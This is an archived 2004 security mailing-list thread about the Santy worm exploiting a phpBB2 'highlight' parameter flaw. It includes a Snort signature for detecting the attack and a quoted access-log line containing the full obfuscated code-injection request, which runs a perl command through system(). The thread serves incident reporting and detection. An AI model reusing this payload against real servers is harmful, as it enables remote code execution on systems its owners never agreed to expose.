Security Incidents mailing list archives
RE: Worm hitting PHPbb2 Forums
From: "M. Shirk" <shirkdog_list () hotmail com>
Date: Tue, 21 Dec 2004 19:53:09 -0500
I missed an important "F" on my previous post for these snort sigs.alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"BLEEDING-EDGE phpBB Highlighting Code Execution - Santy.A Worm"; flow:to_server,established; uricontent:"/viewtopic.php?"; nocase; uricontent:"&highlight='.fwrite(fopen("; nocase; reference:url,www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513; sid:9999999; rev:1;)
Shirkdog http://www.shirkdog.us
From: "Mike" <mike_sha () shaw ca> To: <mark () onnow net>, "L. Walker" <lwalker () magi net au> CC: <incidents () securityfocus com>, <full-disclosure () lists netsys com> Subject: RE: Worm hitting PHPbb2 Forums Date: Tue, 21 Dec 2004 13:28:27 -0500 Does this affect PHPBB2 in general, or is it platform specific as well? Mike Fetherston > -----Original Message----- > From: mark () onnow net [mailto:mark () onnow net] > Sent: Tuesday, December 21, 2004 12:47 PM > To: L. Walker > Cc: incidents () securityfocus com; full-disclosure () lists netsys com > Subject: Re: Worm hitting PHPbb2 Forums > > Front what I have read, this can happen in any phpbb version lower than > 2.0.11 > > This exploit is becoming frequent. Normally uploading a ddos bot. > > Mark > > Quoting "L. Walker" <lwalker () magi net au>: > > > Just spotted two clients hit by this. One client didnt update his > > software (PHP 4.3.4, Apache 1.3.22) and was rootkitted by generation 16. > > Chkrootkit says its Adore, however could be something else. Datacenter > > wasn't very smart and has since wiped the server, so no binaries or > other > > evidence. > > > > Generation 12 only wiped out PHP files, replacing them with its own > > message on other client's PHPbb2 forum. Access logs show: > > > > 66.220.28.92 - - [21/Dec/2004:18:07:17 +1100] "GET > > > /forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&highlig ht > =%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252ech r( > 32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252ech r( > 112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252ec hr > (84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252ec hr > (49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252 ec > hr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252 ec > hr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)% 25 > 2echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)% 25 > 2echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106 )% > 252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78 )% > 252echr(41)%252echr(34))%252e%2527 > > HTTP/1.0" 200 270 > > > "http://www.noobforces.net/forum/viewtopic.php?p=1445&sid=d2260869a73fb5 ac > a2aed0d8a88cf55a&highlight=%2527%252Esystem(chr(112)%252echr(101)%252ech r( > 114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252ec hr > (34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252 ec > hr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252e ch > r(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252 ec > hr(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%25 2e > chr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110) %2 > 52echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89) %2 > 52echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)%252echr(12 2) > %252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(9 7) > %252echr(110)%252echr(78)%252echr(41)%252echr(34))%252e%2527" > > "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" > > > > -- > > L. Walker <lwalker at magi dot net dot au> > > Network Administrator / Consultant > > -- > > > > > > > ---------------------------------------------------------------- > This message was sent using IMP, the Internet Messaging Program.
_________________________________________________________________FREE pop-up blocking with the new MSN Toolbar get it now! http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/
Current thread:
- Worm hitting PHPbb2 Forums L. Walker (Dec 21)
- Re: Worm hitting PHPbb2 Forums mark (Dec 21)
- Re: Worm hitting PHPbb2 Forums Chris Ess (Dec 21)
- Re: Worm hitting PHPbb2 Forums lists (Dec 21)
- Re: Worm hitting PHPbb2 Forums Chris Ess (Dec 21)
- Re: Worm hitting PHPbb2 Forums lists (Dec 21)
- Re: Worm hitting PHPbb2 Forums Barrie Dempster (Dec 21)
- Re: Worm hitting PHPbb2 Forums lists (Dec 21)
- <Possible follow-ups>
- RE: Worm hitting PHPbb2 Forums Christopher Adickes (Dec 21)
- RE: Worm hitting PHPbb2 Forums Mike (Dec 21)
- RE: Worm hitting PHPbb2 Forums M. Shirk (Dec 22)